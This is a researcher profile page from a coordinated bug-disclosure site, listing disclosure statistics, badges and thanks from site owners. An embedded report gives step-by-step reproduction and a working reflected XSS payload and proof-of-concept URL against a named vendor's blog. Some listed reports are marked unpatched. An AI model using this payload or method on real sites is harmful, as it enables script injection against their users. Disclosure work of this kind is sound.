Report a Vulnerability
Submit, help fixing, get kudos.
Start a Bug Bounty
Run your bounty program for free.
531,317 coordinated disclosures
287,307 fixed vulnerabilities
732 bug bounties with 1,447 websites
14,877 researchers, 1070 honor badges

ELProfesor Top Security Researcher of the Month | Security Researcher Profile


Security researcher ELProfesor has already helped fix 2488 vulnerabilities.



Researcher reputation:  1430

Real name:
TAHA SMILY

About me:
Our Democracy has been Hacked ! F**K society

How to contact me:
this is my email adresse : [email protected]

Alternative Contacts:
https://www.linkedin.com/in/taha-smily-195aa3145/

Experience in Application Security
3-5 years

Award / Bug Bounty I prefer:
I prefer :
- Rewards
- Benefits Gifts
- Swag
- Hall of Fame
- Acknowledgment
- PayPal Money


Anything that you wish to award me will motivate me to continue doing what I'm doing

Follow me on:
Twitter
LinkedIn

Recommendations and Acknowledgements

    26 March, 2020
     KyleGeorgeArch Kyle Arch from Learning Pool:
Thank you ElProfesor for responsibly disclosing an XSS issue and providing the reproduction steps. With your help we've identified the issue and are working on a fix. Thank you for your hard work and responsible practices.
    10 March, 2020
     GColsoul Guy from Ineo:
Thank you for your vigilance. It helps us to improve continuously our systems. Very helpful.
    10 March, 2020
     RuncornLinnets Steve Pritchard from Runcorn Linnets FC:
Taha found a particularly tricky XSS problem on our site, and responsibly reported it to us so we could correct the issue. We thank him for his responsible disclosure and hard work bringing security flaws like this to our attention.
    9 March, 2020
     IT_Wolve Markus from Pepperl+Fuchs AG:
Thank you Taha for reporting and helping us finding these XSS issues on our website. We fixed it.
    16 February, 2020
     bigwavedave_ca DaveB from bwd:
Thank you Taha for finding and reporting the vulnerability on my website.
    3 February, 2020
     searacom Pedro Marques from Seara:
ElProfesor, thanks for reporting the XSS vuln, the quick reply and clear message that led us to the right correction. Great job!
    3 February, 2020
     vavideode Vavideo from Vavideo:
Thank you very much for making suggestions about security vulnerabilities!
    30 January, 2020
     SecuriteInfoCom Arnaud Jacques from Securiteinfo.com:
Thank you for your report. It is now fixed.
    29 January, 2020
     Travelmath John from Travelmath:
Great job finding a vulnerability that others missed. I have fixed the issue now, thanks for your help.
    28 January, 2020
     daZwiafl dazwiafl from Meramo Verlag GmbH:
Very responsive and provided clear information about what they had found.

Shows the first 10 recommendations. See all.

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:9057
Total reports on VIP sites:1824
Total patched vulnerabilities:2488
Total vulnerabilities on Hold (Open Bug Bounty):1229
Recommendations received:96
Active since:12.10.2017
Top VIP Security Researcher Awards: Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week

Open Bug Bounty Certificate



27.11.2019  Reflected xss in 360totalsecurity

i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce :

Go to https://blog.360totalsecurity.com

and To : https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x"><svG onLoad=prompt(document.domain)>

Poc:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x"><svG onLoad=prompt(document.domain)>

Regards,

TAHA

21.11.2019  blind xss in apple

This is my report about blind xss in apple via user agent


Reported Vulnerabilities

All Submissions VIP SubmissionsFeatured Submissions

Domain Reported Status Type
15.04.2018
patched
Cross Site Scripting
12.04.2018
patched
Cross Site Scripting
12.04.2018
patched
Cross Site Scripting
12.04.2018
patched
Cross Site Scripting
11.04.2018
unpatched
Cross Site Scripting
11.04.2018
patched
Cross Site Scripting
11.04.2018
patched
Cross Site Scripting
11.04.2018
patched
Cross Site Scripting
11.04.2018
unpatched
Cross Site Scripting
11.04.2018
patched
Cross Site Scripting
07.04.2018
patched
Cross Site Scripting
07.04.2018
unpatched
Cross Site Scripting
07.04.2018
unpatched
Cross Site Scripting
07.04.2018
unpatched
Cross Site Scripting
07.04.2018
patched
Cross Site Scripting
07.04.2018
patched
Cross Site Scripting
07.04.2018
unpatched
Cross Site Scripting
06.04.2018
patched
Cross Site Scripting
06.04.2018
patched
Cross Site Scripting
05.04.2018
patched
Cross Site Scripting

  Latest Patched

 30.03.2020 extrabux.com
 30.03.2020 camaieu.fr
 30.03.2020 anekdotov.net
 29.03.2020 gir.am
 28.03.2020 shorturl.at
 28.03.2020 degruyter.com
 28.03.2020 letmejerk3.com
 28.03.2020 vanityfair.com
 28.03.2020 team1x1.com
 28.03.2020 seguradoralider.com.br

  Latest Blog Posts

12.03.2020 by Rando02355205
(Paypal) www.paypal.com [CSP High Level] - [XSS Reflected] - [Bug Bounty] - [Write Up]
08.03.2020 by CybeReports
JDECO.net XSS Vulnerability| CybeReports
29.02.2020 by Rando02355205
(Google) groups.google.com - [Stored XSS] - [Bug Bounty] - [WriteUp] - [24/02/2020]
10.02.2020 by 0xrocky
Stored XSS on h2biz.net
10.02.2020 by ismailtsdln
SQL Injection Payload List

  Recent Recommendations

    30 March, 2020
     omartanti:
Thank you for reporting the problem and giving detailed explanations on how we would sort it out.
    27 March, 2020
     hstead:
Very rapid communication and detailed instructions as to how to fix the issue. Thanks for the assistance.
    27 March, 2020
     PaulMar23292621:
r00tpgp reported a serious issue to us and helped us with reproducing the issue and pushing towards a fix for the problem.
Thank you very much for the great work!
    27 March, 2020
     Michael3277:
Thanks for your report. With your help we could find the bug and make our Website safer!

roker is a friendly Security Resercher who is answering very fast to mails!
    26 March, 2020
     KyleGeorgeArch:
Thank you ElProfesor for responsibly disclosing an XSS issue and providing the reproduction steps. With your help we've identified the issue and are working on a fix. Thank you for your hard work and responsible practices.